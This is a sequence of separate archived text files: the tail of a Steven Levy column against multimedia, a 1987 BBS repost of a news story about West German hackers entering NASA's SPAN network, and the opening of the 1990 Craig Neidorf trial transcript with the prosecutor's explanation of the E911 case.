and pictures and noises and motion, it's oriented not to the mind, but to the 
senses and the gut - like television. Multimedia disregards the previous 
communications paradigm: the person as reporter, blending logic, language 
and perhaps illustrative charts in order to inform or compel. The new 
paradigm sees the user as a television director, most often one who works 
in the advertising business.
    The result is a debasement of content, because the language of 
television, as convincingly argued by New York University professor Neil 
Postman in his book "Amusing Ourselves to Death" (Penguin, 1985), is 
inherently incapable of promoting complex discourse - style _always_ 
overwhelms substance. Postman writes, "Television's conversations 
promote incoherence and triviality...the phrase 'serious television' is a 
contradiction in terms...and television speaks in only one persistent voice - 
the voice of entertainment."
    Entertainment, of course, is the bottom line of multimedia. Just 
listen to its promoters. (Most of them are marketing men like John Sculley.) 
Invariably they describe these innovative modes of expression as "exciting" 
or - the most common description of all - "sexy". These adjectives are 
applied regardless of the content of the concepts or facts to be processed 
through the multimedia mill. Multimedia deals solely with the style in 
which information is conveyed. Thoughts are permitted, but they can't look 
like thoughts - you have to dress them up like showgirls. Sooner or later you 
realise that you communicate more effectively in this medium if you ditch 
complex thoughts altogether.
    The ethos of multimedia was unwittingly expressed recently in a New 
York Times op-ed piece written by Robert W. Pittman, the television 
executive who created MTV. He argues, in essence, that the postwar 
generation of so-called TV babies have grown accustomed to, indeed are 
entitled to, the short-term, emotion-geared, nonintellectually engaging 
forms of discourse exemplified by television news and music video clips. 
Pittman suggested that politicians and educators should use even more of 
this form of communication. He wasn't speaking of computers, but 
multimedia fits right into his vision: it stretches the ability of computers 
to cater to the short attention spans and nonlinear thinking processes of 
nonliterate TV babies. Thus we face a future where our business reports and 
school papers aspire to the communicative standards of a Def Leppard clip 
in MTV heavy rotation.

Will It Fly?
    We  see a good example of this TV baby communication in the 
justifiably excoriated Apple advertising campaign in which some would-be 
geniuses in some corporation hatch the idea of a "helocar," and  proceed to 
convince their bosses to give the project a thumbs-up. What bothers me 
about the ads is that by using multimedia to illustrate the concept - making 
a kinetic report chock-full of exploding charts and flying vehicles - the 
main effort is spent not in doing the hard work of figuring out whether or 
not the thing will literally fly, but in creating the sexy images that will get 
their bosses all heated up about the concept. What makes the workers 
successful is not the idea, but the flashy presentation. Who cares whether 
the helocar makes financial sense? Look at it fly!
    Essentially, the ad campaign views workers, even engineers, as 
marketers whose job it is to sell ideas to their superiors. That may be a 
valid interpretation of part of an engineer's job, but placing the heavy 
artillery of Madison Avenue in the hands of an engineer will likely do much 
more harm to the process than good. Those tools are effective precisely 
because of their ability to bypass logic and access emotion. The victory goes 
to the engineer who can make the best commercial - not the best vehicle.
    This process almost guarantees that choices will be made on 
irrelevant criteria. To quote Neil Postman again, "The commercial disdains 
exposition, for that takes time and invites argument. It is a very bad 
commercial indeed that engages the viewer in wondering about the validity 
of the point being made...Moreover, commercials have the advantage of vivid 
visual signals through which we may easily learn the lessons being taught. 
Among those lessons are that short and simple messages are preferable to 
long and complex ones; that drama is to be preferred over exposition; that 
being sold solutions is better than being confronted with questions about 
problems."
    This is what we want to introduce as the standard means of 
communicating? Obviously, yes. Catherine Nunes, in charge of multimedia in 
Apple's publishing, presentation and audio visual markets, told me that it 
was "very likely" that the writing tools of the future would be able to 
process sound and video images as well as words.

Lowering Higher Ed.
    If multimedia in business isn't bad enough, consider the potential 
effects of multimedia in education. Here again, this platform is being touted 
as a beneficial revolution. No on has bothered to ask, "What are we 
revolting against?" The answer, of course, is reading and writing. Implicit 
in all the hype about multimedia is the premise that language alone just 
doesn't cut it. Those still nourished by this antiquarian activity may argue 
that the ability to express oneself in words, and to understand the words of 
others, is essential to the process of thinking. But multimedia laughs at 
that objection - because multimedia, like its progenitor, television, is 
designed to entertain, at the cost of thinking.
    Let's look at a multimedia project geared to the education market: the 
ABC-TV products that utilise television news footage of important events, 
such as the presidential elections, or the Middle East crisis. Presumably the 
product's purpose is to amplify the failings of the written word. As Doug 
Doyle, Apple's manager of multimedia solutions for higher education, puts 
it, "Traditionally, we thought that information resides in the library - in 
books. But that's not true any more." Multimedia is a way to capture that 
information and, as Doyle says, "add value" to it by including it in the 
learning process.
    That seems to make some sense, but is the gain sufficient to 
overcome the danger that the images will overwhelm everything else? Take 
the ABC product dealing with the Middle East. Presumably, by interacting 
with a multilinked set of video clips loaded with key images and sound bites 
from the Holy Land, the student gets a deeper understanding of the situation. 
Actually, since the language of television is the main form of 
communication here, and the student is encouraged to browse the material 
by accessing a subject here and a subject there, a lack of context is almost 
guaranteed. Some of the clips are quite dramatic but lack a full explanation 
of the circumstances under which they were taped.
    In order to get full use of the system, each student needs to spend 
unhurried time with a Macintosh, a video monitor, and a laser disc player. 
(Apparently one advantage of multimedia over book learning is that the 
former generates significantly higher revenues.) Once installed before a 
machine, students are encouraged to create their own reports on the system. 
Drawing on the culture of TV babies, these reports are not driven by 
language or reasoning, but by the accumulation of vivid images. The students 
are literally asked to perform the function of a television news producer, 
splicing clips together for maximum impact. And clever students will soon 
learn, as clever television producers understand all to well, the facts of 
dealing in a visual medium: one dramatic image, even if misleading, 
communicates more effectively than an interesting idea without a 
compelling picture accompanying it. It's history by sound bite. Doug Doyle of 
Apple insists that responsible teachers will prevent this from happening, 
but in light of our national experience with television - which has 
trivialised literature to sitcoms and transformed our politicians into 
pitchmen - this seems rather optimistic.

If Books Could Talk.
    Recently I spent a session with Marc Canter and John Scull, the two 
key executives of MacroMind. They guided me through an impressive tour of 
their newest version of Director, a program designed to enliven information, 
multimedia style. Canter was frank in admitting that, given the present 
state of computer power, the only way Director and other powerful 
multimedia tools can be implemented is in expensive machines with 
relatively hard-to-use applications. Even so, those who do this type of work 
anyway - art directors and advertising people and television graphics folks 
- will currently find a Macintosh to be a cost-effective tool. I see no 
problem at all with lowering the cost of tools to people already involved in 
this form of show business, and MacroMind is doing honourable work in this 
regard. Likewise I think that multimedia capabilities have real value when 
used in areas such as scientific visualisation.
    But Canter and Scull were both gushing about the not-too-distant day 
when our Macintoshes will be more powerful, and their software will be as 
simple to use as a Nintendo machine. At that time, they guess reasonably, 
multimedia will be as accessible to ordinary users as, say, word processing 
is to people today. That will be the day when multimedia will be utilised in 
many instances where previously, logical communication sufficed quite 
nicely - except for the fact that one had to be literate to participate. Marc 
Canter believes that ultimately, multimedia will make significant inroads 
in replacing the beleaguered holdouts of communication, those dinosaurs 
that refuse to yield to pictures and sound...you know, books.
    Earlier, Canter and I had been talking about my current book project. 
As with the previous ones, I proceed with my research on the assumption 
that any images I collect in addition to the the realms of written and spoken 
material I gather will be conveyed only by my language. The finished project 
will be a bound stack of pages consisting of words, accessed a page at a 
time. Canter is convinced this process will be improved upon. "Steve," he 
said, bursting with enthusiasm, "I really believe that ten years from now 
you won't be writing a book in that traditional way. In ten years, books won't 
be written only in text - they'll be done with sound and video and images, 
and people will access it by links, not start to finish."
    Multimedia fulfilled: a world where sensory input is king. Where 
writing is replaced by "authoring." Where the techniques of sneaker ads "add 
value" to charts and spreadsheets, and a thousand words die with every 
picture. Words we could have used. Words that bind a reader and a writer, 
words that bear rereading, words that when carefully unraveled detonate 
fireworks inside the mind and change lives.
    Canter couldn't have meant this, could he? Yet, he said it - within a 
decade, books are going multimedia.
    "What you don't understand, Mark," I said to him, "is that you're 
describing my nightmare."
________________________________________________________________________
Steven Levy is a Macworld columnist and author of "The Unicorn's Secret: 
Murder in the Age of Aquarius" (NAL, 1989).
 

*****************************************************************************

*                                                                           *

*                          Tarkin Darklighter                               *

*                                                                           *

*                               Presents:                                   *

*                                                                           *

*                           The NASA Hackers                                *

*                                                                           *

*                          September 16, 1987                               *

*****************************************************************************

*       Call:  DSF Devestator   (214) 581-7565     Supporting the IIgs.     *

*****************************************************************************



     This was in the newspaper today, and in the interest of keeping the

phreak/hack world informed, here is the article:





     WASHINGTON -- Computer hackers in West Germany broke into a NASA

computer network that contains technical information from space shuttle

flights and were able to manipulate the data stored there, a West German news

report said Tuesday.

     NASA, responding to the report, said its computer-security system

detected three electronic break-ins in August, at least one of which came

from West Germany.  Spokesmen for the National Aeronautics and Space

Administration downplayed the significance of the incident, saying the

network contained postflight technical data from the space shuttle, none of

which was classified.

     The hackers reportedly gained access to information by asking the NASA

computers for information under such keywords as "shuttle," "challenger," and

"secret."

     The NASA network is one of hundreds operated by groups around the world

as a means of sharing information.  The networks are linked to the telephone

system, and authorized users can gain access after connecting their computers

to a phone line.  In most cases, a user needs only to know the networks'

telephone number and a password or access code.

     Computer-security experts say it is impossible to make a computer

network immune to break-in by hackers, computer enthusiasts who like the

challenge of dialing into computer systems without authorization.

Persistence, logic, and clever computer programs allow hackers to break

access codes and find passwords.

     Stringency of access to NASA networks varies depending on the degree of

risk posed by unathorized access, an agency statement said.  All the networks

are routinely monitored and attempted break-ins -- which are fairly common --

are investigated, the NASA statement said.

     The breached computer network, called the Space Physics Analysis

Networks, is one of several that NASA operates.  SPAN lets scientists and

engineers in various universities and other research centers quickly send or

recieve technical data from a space flight.  Its chief goal is to provide

NASA managers with analyses of spacecraft performance.

     "Any individual or organization engaged in NASA-related research can

apply for access to SPAN," a NASA statement said.  "We know of no classified

information which can be accessed through the network."

     NASA spokesman William Marshall said the space agency could not comment

on the hackers' statement that they had been able to manipulate data for

four months.  The hackers did not say that they had done so, but Marshall

observed that legitimate users can enter new data into the system.

     The break-in came to light when a West German television, ARD, reported

on a statement released by the Hamburg-based Chaos Computer Club.  Club

officials reportedly were approached for help by youthful hackers when the

hackers realized the significance of what they had done.

     News reports said young West Germans gained regular access to at least

20 NASA computers and had the ability to paralyze the network.

     The club also said the hackers had gained access to computers at the

European Space Agency in Darmstadt, West Germany, at the European Nuclear

Research Center in Geneva and at the European Laboratory for Molecular

Biology in Heidelburg.

     The Hamburg-based magazine Stern reported similar information Tuesday.

     "When I saw 'Welcome to the NASA headquarters ... installation' on my

screen, I was a little shocked, to say the least," the magazine quoted one

youth as saying.

     The club statement said the hackers penetrated the network to show the

"unbelievable weaknesses" of the security system, and that they had no

interest in the secret data.  It was also said the penetration was discovered

in August and that all organizations using the network were notified.

     So far, no charges have been filed in the case, but a West German

Justice Ministry spokesman said the hackers' actions are punishable by up to

three years in prison and fines.







     Look for more articles such as this in the near future.



*****************************************************************************

*                 Call:  DSF Devestator    (214) 581-7565                   *

*                           Supporting the IIgs.                            *

*                                                                           *

*                    A member of the Deep Space Fleet.                      *

*****************************************************************************


 <The following transcript of Craig Neidorf's trial was provided
by his legal counsel, to whom we are indebted. The page numbers
correspond to transcript pagination. The document was retyped by CuD,
and cross-checked against the original. A spell checker removed
spelling errors, and if any of these errors appeared in the original,
they too were removed.>

********************************************************************


                 IN THE UNITED STATES DISTRICT COURT

                    NORTHERN DISTRICT OF ILLINOIS

                           EASTERN DIVISION

THE UNITED STATES OF AMERICA,      .
                   Plaintiff,      .       90 CR 70
                                   .
                                   .
            v.                     .       Chicago, Illinois
                                   .
CRAIG NEIDORF,                     .       Tuesday,
                   Defendant.      .       July 24, 1990
                                   .
                                   .       10:10 a.m.
                                   .
. . . . . . . . . . . . . . . . . ..


                              VOLUME ONE
                 TRANSCRIPT OF JURY TRIAL PROCEEDINGS
                 BEFORE THE HONORABLE NICHOLAS J. BUA
                              AND A JURY


PRESENT:

For the Government:        THE HONORABLE IRA H. RAPHAELSON,
                              United States Attorney, by
                           WILLIAM J. COOK
                           COLLEEN D. COUGHLIN
                           DAVID A. GLOCKNER
                              Assistant United States Attorneys
                              219 South Dearborn Street
                              Fifteenth Floor
                              Chicago, Illinois 60604

For Defendant:             SHELDON T. ZENNER
                              Katten, Muchin and Zavis
                              525 West Monroe Street
                              Suite 1600
                              Chicago, Illinois 60606

Case Agent:                TIMOTHY M. FOLEY
                              Special Agent
                              United States Secret Service

Court Reporter:            Agnes M. Thorne
                              Official Court Reporter

- 2 -

     (Twelve jurors and four alternate jurors sworn to try
     issues.)
     (Following proceedings transpired out of the presence of the
     jury:)

     MR. COOK: Judge, we have two short issues to bring up. The
government, obviously, understands the court's rulings on the First
Amendment mistake of law. We are in a bit of a quandary in terms of
the best way to argue that or front that with the jury during our
openings. Does the court anticipate giving an instruction as to the
law of mistake of law with respect to this either before Mr. Zenner
talks or at the conclusion of the case?

     THE COURT: At the conclusion of the case in written instructions
to the jury.

     MR. COOK: And that would be along the lines that it is not a
     defense to this violation mistake of law.

     THE COURT: That we will decide at the conference on jury
     instructions.

     MR. COOK: All right.

     THE COURT: Mistake of law is no defense. I think we can agree
to that.

     MR. ZENNER: No.

     THE COURT: We can't?

     MR. ZENNER: Wait. We agreed that the First Amendment is no
defense. Mistake of law is a defense to a specific intent crime.

     MR. COOK: That's enough. That's enough for me to make my

- 3 -

Cook -- opening statement

opening.

     THE COURT: Is that enough?

     Mr. Cook: Yes.

     THE COURT: Okay. What else?

     MR. COOK: Also, Mr. Zenner is indicating that he wants to
argue about the videotapes or make some presentation about the
videotapes in his opening remarks. Those are irrelevant.

     THE COURT: What is the nature of those videotapes?

     MR. ZENNER: It is very simple. On one of the dates charged
in the indictment, the exact date, in fact, the exact date charged
in the indictment in Count Two, the date the scheme was supposed to
start, Mr. Neidorf was surreptitiously videotaped by the Secret
Service at SummerCon '88, the hacker convention.

     THE COURT: Okay, now I recall.

     MR. ZENNER: That is the subject of that. The fact that he is on
videotape for 15 hours on the date he is supposed to have committed
the crime in the midst of a supposed conspiracy with some
of the other people who are on videotape I expect to mention,
albeit very briefly, probably ten seconds worth in an opening,
well, maybe thirty seconds worth in an opening, that he was
videotaped on that day, a date charged in the indictment, and that
the worst thing they saw him do or talk about when he was with these
people he is supposedly conspiring with is to drink a beer, order
a pizza. I mean, that's it. They have a the videotape in the middle
of this scheme with his coschemers.

- 4 -

Cook -- opening statement

     THE COURT: And what's the problem with that?

     MR. GLOCKNER: Judge, we went through all this before on the
discovery motions. And your Honor agreed with the government that
(a) the fact that the defendant is videotaped not committing a
crime is not relevant to whether or not on some other occasion
he did.

       Second, as we argued in the earlier filings with your Honor,
he is not charged with holding SummerCon, with participating
in SummerCon...

     THE COURT: You will object to the entry in evidence of that
videotape?

     MR. GLOCKNER: Absolutely.

     THE COURT: The objection will be sustained.

     MR. GLOCKNER: Thank you.

     THE COURT: What else?

     MR. COOK: Nothing else, Judge.

     MR. ZENNER: With respect to the videotape, I accept the court's
ruling that the videotape will not be introduced, but I can
certainly refer to the fact that he was videotaped, and I can ask the
agent that, and I intend to ask the agent who investigated this case:
"On a date charged in the indictment..." Mr. Cook is going to show
that. He is going to say, "On July 22, 1988, my client committed
a wire fraud". He's going to tell them to convict him of that.
On that date, he's on videotape for fifteen hours with the Secret
Service looking at him, and he doesn't do anything of the sort.
He's meeting with his coschemers...he's meeting with his
coconspirators.

- 5 -

Cook -- opening statement

     THE COURT: And you will seek to introduce the videotape to
show that he couldn't have committed the crime on that date?

     MR. ZENNER: All I want to be able to do is to cross-examine
Agent Foley on that.

     THE COURT: Well, you might be able to cross the agent
depending on what his direct testimony is. Those issues...

     MR. ZENNER: It is a date charged in the scheme. I have a hard
time imagining how I can't cross.

     THE COURT: Mr. Zenner, you can make the opening statements, and
if there is an objection, I will sustain it. Okay.

     MR. ZENNER: All right.

     THE COURT: What else?

     MR. COOK: Nothing.

     THE COURT: Bring in the jury please.

     (Jury present at 10:20 a.m.)

     THE COURT: Good morning ladies and gentlemen.

     JURORS: Good morning.

     THE COURT: Please be seated.

          Mr. Cook, is the government prepared to make its opening
statement?

     MR. COOK: Yes, Judge.

     THE COURT: Very well.

     MR. COOK: Thank you.

_OPENING STATEMENT ON BEHALF OF THE GOVERNMENT_

     MR. COOK: Good Morning, ladies and gentlemen.

- 6 -

Cook -- opening statement

     JURORS: Good morning.

     MR. COOK: My name is Bill Cook. I'm an Assistant United States
Attorney. I am going to be substantially aided in this prosecution
by Colleen Coughlin, who is an Assistant United States Attorney, and
Dave Glockner, who is also an Assistant United States Attorney. We
will be having Special Agent Tim Foley of the United States Secret
Service working with us. He is sitting at the trial table with us.
           In 1876, the first telephone communication ever made was:
                 "Mr. Watson, come here, I want you".
That was also the very first emergency telephone call ever made.
Since that time, the telephone company has, obviously, sophisticated
their operation to a large degree so that where we stand today in
1990, we are the beneficiaries of what is known as the Enhanced 911
system. That system is a life line for every person certainly in the
Southern Bell region of the United States. It's taken for granted.
It is an extensively developed system. You're going to hear a great
deal of information about the development of that system and the
architecture that that system is based upon. It is built on
computers from bottom to top.
          In 1988, a road map to that computer system, that life
line, was stolen from a computer in Atlanta, Georgia, by a man
by the name of Robert Riggs, who is a member of an organization
known as the Legion of Doom.
          That document, with its proprietary markings, its warnings

- 7 -

Cook -- opening statement

on it, and the clear indications that it was the property of
BellSouth, was transferred electronically to Mr. Craig Neidorf, the
defendant here, seated right here.

          Mr. Riggs is a hacker, a person that breaks into
computers. He answers to no one but his own ability to get into
those computers.

          We anticipate that the evidence will show that in February
of 1989, Mr. Neidorf published that extensive road map to the
life line of the entire hacker community so far as he was able to
determine it and define it.

          In many respects, I submit to you that this is not going
to be a, "Whodunit", or "What was done?".

          There are two sets of violations charged in the indictment.
Very briefly, they are the interstate transportation of stolen
property and what is referred to in legal jargon as a wire fraud.

          With respect to the interstate transportation of stolen
property, the evidence will show that Mr. Neidorf admitted to
receiving the stolen property, the stolen E911 text file from Robert
Riggs. He further admitted to Agent Foley that at the time he
received the document, he knew it was stolen.

          With respect to the wire fraud the evidence will show
that the wire fraud was really an outgrowth of what you are going to
be hearing about and what will be described as the Phoenix Project,
an effort by Mr. Neidorf to consolidate a group of hackers.

          The object of that wire fraud scheme was extensive, but it


- 8 -

Cook -- opening statement

included providing hackers with information about how to crack into
other people's computers, soliciting them to try to provide him
articles, articles for his publication PHRACK  newsletter which
he would then distribute to other hackers.

          The evidence will also show that Mr. Riggs knew of the
hacker activities, the break-ins that were occurring as he would
follow along with their activities. In that respect, he was almost
a "hacker groupie", except a groupie that sought to be in control and
direct many of the operations. He received stolen property, property
stolen from computers, stored on computers.

          Now, just one more set of observations about the indictment
and the format of the indictment, and then I'll move on to what
some of our more immediate concerns might be.

          (Chart) Does everybody see that? One juror I know can't
see the bottom.

     THE COURT: Can all the jurors now see that?

     JURORS: Yes.

     MR. Cook: Mr. Neidorf is charged in each count of the indictment,
except for the first count here. The coding here is this is the
second count of the indictment on down to Count Eleven. These
are the approximate dates that the violations or the activities
occured that are alleged in the indictment.

          Specifically, in the second, the second count of the
indictment alleges that on July 22, 1988 as part of the wire fraud
scheme, Mr. Neidorf generated an issue of PHRACK World News in which

- 9 -

Cook -- opening statement

he announced the instigation of the Phoenix Project, the Phoenix
Project because it had been a year since the 1987, in their parlance,
collapse of the computer world by virtue of a series of law
enforcement raids. Mr. Neidorf announced here that he wanted the hacker
community to come together again to be more effective than ever.

          The next activity is the third count of the indictment,
September 19, 1988, a wire fraud allegation again, E-mail,
electronic mail, generated from Mr. Neidorf to Mr. Riggs and
Mr. Scott O, a computer hacker.

          This electronic mail, this electronic mail here also,
these are efforts by Mr. Neidorf reaching out to consolidate,
identify and pull together a group of hackers that he could be
working with for the publication of PHRACK, people that would supply
him with information and articles, and, as it turned out, people that
in fact, supplied him with stolen information, stolen from computers.

          These allegations refer more directly to the interstate
transportation and movement and file transfers of the E911 text file.

          Count Seven refers to the publication of a series of
computer articles that deal with how to break into a UNIX operating
system.

          Counts Eight and Nine refer to the text file being sent from
Neidorf back to Riggs, from Neidorf in Missouri to Riggs who was
physically in Atlanta, but who used the bulletin board, computer
bulletin board, in Lockport, Illinois, sending it back for review and
to make sure that Neidorf had done an adequate job of concealing the

- 10 -

Cook -- opening statement

nature of the file fro the point of view not the contents so much
of the file, but concealing where Riggs had stolen it from to protect
Riggs, and, to a large degree, to protect himself so that it couldn't
be identified exactly where the document had been stolen from.

          Finally, we have the publication of the E911 text file in
the PHRACK newsletter by Mr. Neidorf.

          you will be seeing the indictment in the jury room as you
deliberate. This is just an overview to give you an overfocus of
where the allegations are going to fall and the types of information
that you are going to be hearing about.

          Now, if I were you, if I were you, I would be sitting
there, as some of you may be, thinking to myself, "What have I gotten
myself in for? He's talking about computers. He's talking about
operating systems. Whooooaaaa!"

          First of all, you don't need to be a computer user, or a
computer ace, to understand what this case is going to be about. It
really deals with, in its most essential form, stealing property and
transferring property, the interstate transportation of stolen
property. So it's a simple stealing and a simple fraudulent
taking, taking by deception. But it just involves some relatively
high-tech tools. Don't let the tools confuse you from the fact of the
taking and the bottom-line information. I'm telling you to relax
about the computer jargon.

          There are several concepts that we're going to be talking
about here. What I'm going to give you is a kind of a lawyer's

- 11 -

Cook -- opening statement

description. That is supposed to let you know that it is far from
an expert's opinion on some of the things you're going to be hearing.

          (Blackboard) Well, let's talk about some of the technology
that's involved, and see if we can't make ourselves more comfortable
with it.

          I referred to the UNIX operating system. UNIX...U-N-I-X.
What is that? Well, computers speak a language. Computers speak
the language that the people that built the computer want them to
speak, or they speak the language that the people that run the
computer want it to speak. Sometimes computers can be set up so that
you can have them speak several different languages. UNIX is just a
language. It is just the language that the computer speaks. It
talks UNIX. Some of you talk about MS/DOS. It's a microsoft disk
operating system. Forget it! It's just the language that the
computer speaks.

          (Blackboard) Now, this is a theft of information. You are
gong to be coming in contact with the concept that when you take
information from a computer, what you really do is you order the
computer to make a duplicate original o what its memory is or what
it contains with respect to that particular item. And when you are
asking the computer to send that information to you, you are doing a
file transfer. I'll get to that later. You are just telling the
computer to send it to you. What the computer sends to you is a
copy. It's an exact copy in every respect of the original
information on the computer.

- 12 -

Cook -- opening statement

          So the value of the property comes from the fact that it
contains information. There is an expression that, "Information is
power". It is only power if it's communicated. That's where the
value of information comes from in our society.

          Certain types of information are protected by companies.
They are reasonably protected by companies, especially when they
become sensitive. The E911 road map and the information about where
all the stops along the way are, that was a sensitive piece of
information. You're going to be hearing about the protections that
BellSouth put on that information, and the efforts that they made to
safeguard it. So when the information is stolen, what is stolen is a
copy of the information. You will be receiving further instructions
>from the judge on all that. So it is the information that is being
stolen.

          (Blackboard) Now, the next concept--I talked about
protection--file transfers. File transfers. Here's a riddle for you:
                  "Why is a file transfer the same as a high
                  school graduation?"
Here's the answer. When you hear about this, think about a high
school graduation. They call your name from the audience. You come
up to the stirs, probably by the path that the nun ordered you to
take to get to the stage, and you had better not vary from the path.
You follow that route up to the stage, across the stage, and a file
transfer takes place at center stage in the auditorium. You reach
out, you shake hands with the principal, and with the other hand,
after you have shaken hands with the principal, you receive your

- 13 -

Cook -- opening statement

diploma, or you receive your information, you receive your file.
That's really all a file transfer is on a computer. You come up,
you are ordered, someone in a remote location, the principal in this
case, calls your name, you come up to the stage, you are the
computer on one side and he is the computer on the other side. You
shake hands. And in the computer world, all that means is that you
are able to communicate. It's actually called that. It is called a
"handshake relationship" with another computer. There are some other
words, like "protocol" and things like that, but, really, it is just
a handshake relationship with another computer.

          After the handshake is there and the principal recognizes
you to be the problem kid that he's glad to get rid of--he didn't
like you--then he gives you the file. That's the file transfer. It
is no different transferring information from one computer to
another.

          (Blackboard)  Computer network. Well, that is probably a
pretty easy concept to get hold of these days. It is really not much
different than with your televisions, especially if you have cable
television where you have some designated programming and it comes in
to your machine, your television in this case. Of course, the
difference is with cable television as opposed to a computer, with
the computer you are able to have more of an interchange with the TV
and what is going on with the program. So don't be concerned about
the network idea. Keep in mind the idea of a cable coming into your
computer as part of a centralized system. That is really all the

- 14 -

Cook -- opening statement

network is, a series of computers joined together.

          In the case of BellSouth, you are going to see that that is
a very expensive computer network. In order to provide service to
their customers, they hang a lot of computers on that network,
computers that do different things, computers that keep track of
where the people that are using the phones are at, computers that
keep track of what telephone number goes with what address, computers
that keep track of the switches, the computer switches. Now,
that's another concept I'll talk about for a second.

          (Chart) When people think of computer switches, they
are telephone switches. The concept of a lady at the switchboard
always comes to mind with a knob here that goes to a hole up here,
connecting one person to another person. Today, all of that is done
by high-speed computers, high-speed switches. They are electrical.
Because they are electrical, they are referred to as ESS. All this
means is an electronic switch. This is a computer. This computer
has the memory of how to get the numbers that are diales to the
phone that corresponds with those numbers. These computers also have
the information about how to get your call all the way across the
country, which route are we going to take to get there, which
road are we going to take.

          The Enhanced 911 system was built on these computers.
Part of the reason was because of the high speed that is involved.
You can get the emergency call through faster if it goes like thing.

          Now, the switches at various areas: Switch 1, Switch 2.

- 15 -

Cook -- opening statement

This is the first switch we produced, Switch 1. And the second
switch we produced, Switch 2. The fifth switch, Switch 5.

          When they increased the capabilities of those switches, the
way they kept track of which switch they were talking about was to
label the switches: 1 or 1A, 2, 3, 4, 5, a fairly easy way to keep
track of the switch development. But the idea is that all electronic
switches operate essentially the same. So if you have the key to
get into this (indicating), you have the keys to get into them all.

          The evidence will show that the hackers in the BellSouth
Region had the keys to get into them for a period of time.

          Now, another question, a riddle:
               "Why is computer security like a hotel?"
Mr. Garcia is going to be explaining that to you. Actually, it's a
lot like staying in a private hotel.

          In the case of the computers at BellSouth, the computers
that drive the E911 system and support the phone company system
aren't known to the public. They are unpublished numbers. They
have their own network. The network, to be sure, has interlinks
with the private sector and can be reached by field people in the
telephone company, but it is really a closed system. It is designed
to be for protection.

         So the hotel, the computer, is not known to the outside
world. Where the door is is not known to the outside world. When
you walk into the hotel, it's like if you try to walk into a hotel
in downtown Chicago. If you go to the desk and ask them, you know,

- 16 -

Cook -- opening statement

               "I want to have Joe Jones' room".
Well, first of all you say:

              "I want to see Mr. Jones."

                   "Well, we can't tell you if he's here."

               "Well, if you tell me he's here, I want
               to talk to him. I want to speak to him.
               Give me his room number.

                   "Well, we're not going to give you
                   his room number. You are going to
                   have to call him on the house phone
                   and he'll have to verify that you're
                   somebody he knows."

So there are a series of checks that are set up inside the system.
But once you get inside the hotel, you can make contact with Jones.
And you will see, just as in real life, you have a number of people
at one hotel. You will have people going back and forth in the
hotel. And the person that runs the hotel assumes that they're all
there for good valid reasons. He's not going to do anything but
just a cursory check to make sure that everything is still in order.

          It is really the same thing and the same principle is
involved if you are the system administrator on one of these
computers. You are in the position, in the shoes, of the hotel
operator, the guy that runs the hotel or the lady that runs the
hotel. You make sure that the right people show the right
credentials to get in and you exercise and upfront control. You also
exercise control over some of the common spaces. You make sure the
halls are lit. You make sure that things aren't being badly
destroyed to the best of your knowledge, although you don't know always

- 17 -

Cook -- opening statement

what's going on inside each of the rooms. It's very much the same.
So when you hear a person talk about running a system or computer
system security, think to the analogy of being a hotel operator.
We have a man, Mr. Garcia, from BellSouth, who will be testifying
to that and to that analogy, and I think you'll find it most
interesting.

          (Blackboard) Text file. You will hear a lot about that.
That is probably a new term for you when you walked in: text file.
Just think of it as a book or a pamphlet stored on a computer.
That's it. That's the end of the mystery. A book or a pamphlet
stored on a computer. But because it is stored on a computer, it
can be copied if you can get into the computer. That's what
happened here.

          (Blackboard) BBS. It means bulletin board system.
Sometimes it will have a "C" in front of it. All that means is
computer bulletin board system.

          Now, here's my analogy to that. The computer bulletin
board system is a lot like a private high school where you have to
have permission to get in the front door. And the people that run
the high school have to give you permission to get into their
private location. But once you get into their private high school
and as you walk through, one of the first things that meets you as
you walk into the private high school is a bulletin board with
messages posted on it. And what you will also see along the sides of
it are going to be lockers, student lockers.

- 18 -

Cook -- opening statement

          The principal bulletin board that you are going to be
hearing about during the course of this case is the Jolnet bulletin
board in Lockport, Illinois. The Jolnet bulletin board in Lockport,
Illinois, acted as a central clearing house for the information that
was being sent from Riggs in Atlanta to Neidorf in Missouri.

          To carry the analogy a little further, the evidence is
going to show that Riggs used the bulletin board. He used it under
a false name which he used to disguise his real identity. He use it
under the name of Robert Johnson instead of Robert Riggs. He had
authorization to use the bulletin board section where you post
messages generally, and he also had a storage locker on the bulletin
board, on of those lockers along the wall in a high school, where he
thought he could safely store the text file, the E911 text file that
he had stolen. The evidence is going to be, though, that law
enforcement, Hank Kluepfel, found out about it. Mr. Kluepfel's
efforts to get into and to use Jolnet in that storage area will be
testified by Mr. Kluepfel. But the only thing we need to remember
here at this point is that the information was stored in Lockport,
Illinois. That is where the private high school is located. It was
stored in the locker of a private high school in Lockport.

          But because computer technology is the way it is, Riggs is
able to transfer the file by E-mail or a file transfer down to
Neidorf in the computers at the University of Missouri. Again, this
analogy is not quite the same as the bulletin board, but the
University of Missouri has a capability there at the university to

- 19 -

Cook -- opening statement

allow students to have essentially a locker on their computer system
where Neidorf generated PHRACK Magazine from.

          Just a final note of reassurance. As we go through the
evidence here, we are going to try to have the witnesses explain as
each step progresses what the technology is again. So hang in there
and listen with an open mind, as I know you will anyhow, listen to
the explanations of the technology.

           (Chart) The evidence in this case is going to show that
the text file that was stolen here described in vivid detail each of
the locations along the E911 path to an emergency call. It's going
to show and it did show the central location and the central
significance of two places. When an emergency call is made in the
BellSouth area, BellSouth region--it is really the area
geographically that southerners describe as "Ol' Dixie"--when an
emergency call is made there, it goes to a thing called a PSAP, public
safety access point. The public safety access point is the one that
is in direct communication on secure lines with the fire, police, and
ambulance.

          Under the old 911 system, the old emergency dialing
system, the call would come in, and they would have to trace it back
to the origin in many cases. You have a situation potentially where
someone would call, perhaps a child, and say, "My dad's hurt", and
before the operator could talk to the child, they hang up the phone.
The child, of course, figures, "Well, I called them. I told them y
dad was hurt. They'll e here". So it is, obviously, not that
easy. Under the old 911 system, a complicated tracing procedure had

- 20 -

Cook -- opening statement

to be established. They had to try to find out where the call had
come from, and it's all done in an emergency posture.

          Now comes Enhanced 911. You will hear the lady that is
operating that system, or operated it for the balance of time
involved in this case. You will also hear from the man, Richard
Helms, that brought all the pieces together for the bellSouth
region, and put them in one central location so that all the phone
companies supporting the 911 system, the Enhanced 911 system, would
all be on board and be working with the same game plan, never thinking
that that game plan was going to be over over to hackers.

          The Enhanced 911 gives you this capability within
three to five seconds of the time that the person picks up an
emergency call and that 911 is entered in, sometimes even before the
person at the public safety access point can pick up the phone. The
computers that drive the 911 system have done this: They have gone,
in this case, to the remote location in Sunrise, Florida, where the
back-up systems and the support systems for the control, the
